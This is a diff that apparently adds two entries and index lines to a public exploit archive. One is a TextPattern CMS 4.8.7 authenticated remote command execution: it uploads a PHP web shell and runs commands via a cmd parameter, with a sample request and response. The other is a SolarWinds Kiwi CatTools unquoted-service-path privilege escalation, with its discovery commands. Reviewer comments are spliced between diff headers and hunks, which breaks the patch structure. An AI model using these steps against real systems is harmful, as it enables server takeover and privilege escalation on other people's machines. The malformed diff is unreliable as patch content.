diff --git a/exploits/php/webapps/50415.txt b/exploits/php/webapps/50415.txt
new file mode 100644
index 000000000..9b675423f
--- /dev/null
+++ b/exploits/php/webapps/50415.txt
@@ -0,0 +1,43 @@
+# Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
+# Date: 2021/09/06
+# Exploit Author: Mert Daş merterpreter@gmail.com
+# Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
+# Software web: https://textpattern.com/
+# Tested on: Server: Xampp
+
+First of all we should use file upload section to upload our shell.
+Our shell contains this malicious code:
+
+1) Go to content section .
+2) Click Files and upload malicious php file.
+3) go to yourserver/textpattern/files/yourphp.php?cmd=yourcode;
+
+After upload our file , our request and response is like below :
+
+Request:
+
+GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)
+Gecko/20100101 Firefox/89.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP;
+PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 200 OK
+Date: Thu, 10 Jun 2021 00:32:41 GMT
+Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
+X-Powered-By: PHP/7.4.20
+Content-Length: 22
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+pc\mertdas
\ No newline at end of file
diff --git a/exploits/windows/local/50416.txt b/exploits/windows/local/50416.txt
new file mode 100644
index 000000000..5fa109e6f
--- /dev/null
+++ b/exploits/windows/local/50416.txt
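Review bot: The sample request's two Cookie lines carry what look like live session values from the test host (`txp_login_public=18e9bf4a21admin`, `PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi`); even for a 127.0.0.1 setup these should be placeholders, e.g. `Cookie: txp_login_public=<redacted>; PHPSESSID=<redacted>`. The header block also omits the account role used to upload, so a reader cannot tell whether this needs an administrator or any user with access to the Files panel; a line such as `# Privileges required: <role used in testing>` would settle it. For defenders the advisory is missing the mitigation side — that the files directory should be served without script execution — which is the control that breaks the path described in steps 2 and 3.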
@@ -0,0 +1,38 @@
+# Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
+# Exploit Author: Mert DAŞ
+# Version: 3.11.8
+# Date: 14.10.2021
+# Vendor Homepage: https://www.solarwinds.com/
+# Tested on: Windows 10
+
+# Step to discover Unquoted Service Path :
+
+--------------------------------------
+C:\Users\Mert>sc qc CatTools
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: CatTools
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\CatTools3\nssm.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : CatTools
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+---------------------------------------------
+
+Or:
+-------------------------
+C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr
+/i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
+----------------------
+
+#Exploit:
+
+A successful attempt would require the local user to be able to insert
+their code in the system root path undetected by the OS or other security
+applications where it could potentially be executed during application
+startup or reboot. If successful, the local user's code would execute with
+the elevated privileges of the application.
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 325172abd..345ae3c1f 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
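Review bot: The advisory stops at discovery; the unquoted `BINARY_PATH_NAME` shown in the `sc qc` output never gets a remediation line, which is what a defender reading this needs. A closing section such as `# Fix: quote the service binary path, e.g. sc config CatTools binPath= "\"C:\Program Files (x86)\CatTools3\nssm.exe\""` (inner quotes escaped for cmd) would suffice, using the path already on the page. The `#Exploit:` paragraph correctly conditions success on write access to the root or `Program Files (x86)` path, which standard users do not have by default; stating that precondition in the header block rather than only in the final paragraph would make the severity clearer. If a fixed build exists, the `# Version:` line should name it; nothing on the page indicates one.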
@@ -11348,6 +11348,7 @@ id,file,description,date,author,type,platform,port
 50332,exploits/windows/local/50332.py,"Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)",1970-01-01,stresser,local,windows,
 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
+50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139
@@ -42672,6 +42673,7 @@ id,file,description,date,author,type,platform,port
 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php,
 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp,
+50415,exploits/php/webapps/50415.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)",1970-01-01,"Mert Daş",webapps,php,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80
 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80